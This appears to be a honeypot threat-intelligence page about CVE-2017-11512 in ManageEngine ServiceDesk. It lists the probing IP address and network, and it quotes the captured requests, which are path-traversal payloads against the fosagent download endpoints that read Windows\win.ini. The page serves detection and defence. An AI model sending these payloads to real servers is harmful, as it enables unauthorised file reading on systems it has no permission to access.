CVE-2017-11512: ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval

HoneyLabs honeypots recorded 2 probes matching CVE-2017-11512 from 1 distinct source IP addresses in the last 7 days. Severity is rated high.

Request paths that identify it

  • /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini
  • /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.2142Techoff Srv LimitedBulgaria

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited21

Captured requests

  • /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini
  • /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini

CVE report

CVE report

Open a specific CVE from the CVE tracker.